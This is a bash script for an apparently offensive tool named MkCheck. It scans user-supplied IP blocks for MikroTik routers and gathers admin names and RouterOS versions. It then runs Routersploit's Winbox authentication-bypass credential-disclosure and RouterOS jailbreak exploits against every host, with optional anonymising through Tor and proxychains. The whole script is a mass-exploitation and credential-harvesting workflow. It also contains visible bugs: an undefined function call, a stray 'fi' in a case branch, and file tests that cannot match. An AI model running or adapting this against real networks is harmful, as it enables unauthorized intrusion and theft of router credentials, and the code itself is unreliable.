#!/bin/bash
LPATH='/opt/MkCheck/'
ORNG='\033[0;33m'
NC='\033[0m'
W='\033[1;37m'
LP='\033[1;35m'
YLW='\033[1;33m'
LBBLUE='\e[104m'
RED='\033[0;31m'
LGRY='\033[0;37m'
INV='\e[7m'
BRED='\033[1;31m'
UPURPLE='\033[4;35m'
UBLUE='\033[4;34m'
URED='\033[4;31m'

sudo chown $USER:$USER -R /opt/MkCheck
cd /opt/MkCheck
# Root Check
if [[ $EUID -ne 0 ]]; then
   echo "This script must be run as root" 
   exit 1
fi
# First check to see if tiks.txt has data
RE=$(cat /opt/MkCheck/files/tiks.txt)
if [[ ${RE} == "" ]]; then
	echo -e "${URED}Please enter an IP block to start scanning first${NC}"
	sudo nano /opt/MkCheck/files/tiks.txt
fi
# Second check to see if data is example data
RR=$(cat /opt/MkCheck/files/tiks.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
if [[ ${RR} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
	sudo rm /opt/MkCheck/files/tiks.txt
	echo -e "${URED}Please enter an IP block to start scanning first${NC}"
	nano /opt/MkCheck/files/tiks.txt
else
	# Check to see if user will keep original data or replace
	echo -e "${W}Would you like to ${URED}k${NC}${W}eep previous target files or start ${URED}f${NC}${W}resh?${YLW}(k/f)${NC}"
	read CONF
	if [[ ${CONF} == "f" ]]; then
		sudo rm files/tiks.txt files/tiks_res.txt tiks_rsf.txt
		echo -e "${W}Please enter your target block${NC}"
		sleep 2
		nano files/tiks.txt
	else
		sudo cp files/session_* files/tiks.txt
	fi
fi
# Routersploit file check (tiks.rsf.txt)
if [[ -f '/opt/MkCheck/files/tiks_rsf.txt' ]]; then
	RT=$(cat /opt/MkCheck/files/tiks_rsf.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
	if [[ ${RT} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
		sudo rm /opt/MkCheck/files/tiks_rsf.txt
		cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_rsf.txt
	fi
else
	sudo cp files/tiks.txt files/tiks_rsf.txt
fi
# Result file check (tiks_res.txt)
if [[ -f '/opt/MkCheck/files/tiks_res.txt' ]]; then
	RS=$(cat /opt/MkCheck/files/tiks_res.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
	if [[ ${RS} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
		sudo rm /opt/MkCheck/files/tiks_res.txt
		cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_res.txt
	fi
else
	cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_res.txt
fi
# Result folder check
if [[ ! -d '/opt/MkCheck/results' ]]; then
	mkdir /opt/MkCheck/results
fi
# RSF folder check
if [[ ! -d '/opt/MkCheck/results/RSF' ]]; then
	mkdir /opt/MkCheck/results/RSF
fi
# Vuln folder check
if [[ ! -d '/opt/MkCheck/results/Vulns' ]]; then
	mkdir /opt/MkCheck/results/Vulns
fi
# Final Results Correlation for Net AP Name 
apresults(){
	for log in `cat /opt/MkCheck/files/tiks_res.txt`
		do
			echo "${log}"
			echo "${log}" >> results/Vulns/final.result
			cat results/Vulns/Mikro_${log}.results
			cat results/Vulns/Mikro_${log}.results >> results/Vulns/final.result
			echo "==========================================================================="
			echo "===========================================================================" >> results/Vulns/final.result
		done
}
# Jailbreak Result Correlation
jbresults(){
	for log in `cat /opt/MkCheck/files/tiks_res.txt`
		do
			echo "${log}"
			echo "${log}" >> results/RSF/final.result
			cat results/RSF/${log}.results
			cat results/RSF/${log}.results >> results/RSF/final.result
			echo "==========================================================================="
			echo "===========================================================================" >> results/RSF/final.result
			sleep 2
		done
}
# New Target Thread for MCheck
target(){
	RARG=$(python3 scripts/get_t.py)
	VAR=$(echo ${RARG})
	FARG='host = "ARG"'
}
# Host Auto Load
running(){
	mv files/tiks1.txt files/tiks.txt
	# Start
	TARG=$(cat scripts/miko.py | grep "host = *")
	sed -i "s/${TARG}/${FARG}/g" scripts/miko.py
	sed -i "s/ARG/${VAR}/g" scripts/miko.py
	echo -e "${UBLUE}Next Target is ${YLW}${VAR}${NC}"
}
function trap_ctrlc ()
{
    # perform cleanup here
    echo -e "${URED}Ctrl-C caught...${NC}"
    echo -e "${W}Would you like to exit?${YLW}(y/n)${NC}"
	read EXIT
	if [[ ${EXIT} == "y" ]]; then
		exit 2
	else
		return
	fi
}
ap_check(){
	if [[ -f '/opt/MkCheck/results/Vulns/*.255.results' ]]; then
		apresults
		sudo cp results/Vulns/final.results results/Vulns/${SESSION}_final.results
		main
	else
		return
	fi
}
rsf_check(){
	if [[ -f '/opt/MkCheck/results/RSF/*.255.results' ]]; then
		rsfresults
		sudo cp results/RSF/final.results results/RSF/${SESSION}_final.results
		main
	else
		return
	fi
}
# Mikro Network AP Name Check (No Proxy)
mchecker(){
	while :
	do
		echo -e "${RED}Press <CTRL+C> to exit.${NC}"
		target
		echo ""
		running
		echo ""
		python scripts/miko.py | tee output.log
		NAME=$(cat output.log | grep 'admin@')
		VER=$(cat output.log | grep 'MikroTik RouterOS')
		echo "${NAME}" >> results/Vulns/${VAR}.results
		echo "${VER}" >> results/Vulns/${VAR}.results
		echo "==============================================================================================" 
		sudo rm output.log
		ap_check
	done
}
# Routersploit Vuln Check
rtsploit(){
	cd /root/routersploit
	for name in `cat /opt/MkCheck/files/tiks_rsf.txt`
		do
			#winbox_auth_bypass_creds_disclosure
			WINSAVE=$(sudo python3.7 rsf.py -m exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure -s "target ${name}")
			echo "${WINSAVE}" >> /opt/MkCheck/results/RSF/${name}.results
			echo "${WINSAVE}"
			# routeros_jailbreak
			JAIL=$(sudo python3 rsf.py -m exploits/routers/mikrotik/routeros_jailbreak -s "target ${name}")
			echo "${JAIL}" >> /opt/MkCheck/results/RSF/${name}.results
			echo "${JAIL}"
			rsf_check
		done	
}
# Update Args
up_arg(){
    echo $1 >> temp.log
    echo $2 >> temp.log
    echo $3 >> temp.log
    echo $4 >> temp.log
    echo $5 >> temp.log
    echo $6 >> temp.log
    echo $7 >> temp.log
    echo $8 >> temp.log
    echo $9 >> temp.log

    for UFILES in `cat temp.log`
       	        do
    	            rm /opt/MkCheck/${UFILES}
                done
    rm /opt/MkCheck/temp.log
}
update(){
    cd /opt/MkCheck
    echo -e "${ORNG}"
    figlet -f mini "Checking for updates"
    echo -e "${NC}"
    git fetch
    VER=$(git pull)
    if [[ ${VER} == "Already up to date." ]]; then
        echo -e "${LP}"
        figlet -f mini "Up to date."
        echo -e "${NC}"
    else
		sleep 5
	    echo -e "${W}Are there pull conflicts with files?(y/n)${NC}"
        sleep 3
	    read UANS
	    if [[ ${UANS} == "y" ]]; then
            export LPATH
            echo -e "${W}Please enter the conflicting files (seperated by a space)${NC}"
		    read FILES
            sleep 2
		    up_arg ${FILES}
		    git pull
	    else
		    git pull
	    fi
	    if [[ -f '/usr/sbin/mkcheck' ]]; then
			sudo cp mkcheck -t /usr/sbin
			sudo chmod +x /usr/sbin/mkcheck
			sudo chown $USER:$USER /usr/sbin/mkcheck
		fi
		main
	fi
  echo -e "${NC}"
}
#MCheck Start
main(){
	# initialise trap to call trap_ctrlc function
	# when signal 2 (SIGINT) is received
	trap "trap_ctrlc" 2
	echo -e "${BRED}"
	python3 files/banner.py
	echo -e "${NC}"
	echo -e "${W}Hit ${UBLUE}Ctrl + z${NC} ${W}to exit completely or ${UBLUE}Ctrl + c${NC} ${W}to quit a scan${NC}"
	PS3='What tool would you like to use?'
		options=("MikroTik Auto-EX" "Routersploit Vuln Check" "Sort Results" "Update")
		select opt in "${options[@]}"
			do
				case $opt in
					"MikroTik Auto-EX")
						echo -e "${W}Please enter a name for this session${NC}"
						read SESSION
						echo -e "${YLW}Backup of this sessions Target file saved as ${UBLUE}session_${SESSION}.txt${NC}"
						cp files/tiks.txt files/session_${SESSION}.txt
						echo -e "${W}Would you like to run MCheck using a proxy?${YLW}(y/n)${NC}"
						read PROXY 
						if [[ ${PROXY} == "y" ]]; then
							sudo service tor start
							proxychains4 mchecker
						else
							mchecker
						fi
						;;

					"Routersploit Vuln Check")
						rtsploit
						;;

					"Sort Results")
						apresults
						rsfresults
						fi
						;;

					"Update")
						update
						;;

				esac
			done
		echo -e "${YLW}All results have been saved to ${UPURPLE}/opt/MkCheck/files/${NC}"
}
cd /opt/MkCheck

echo -e "${LP}"
figlet MkCheck
echo -e "${NC}"
main
exit 0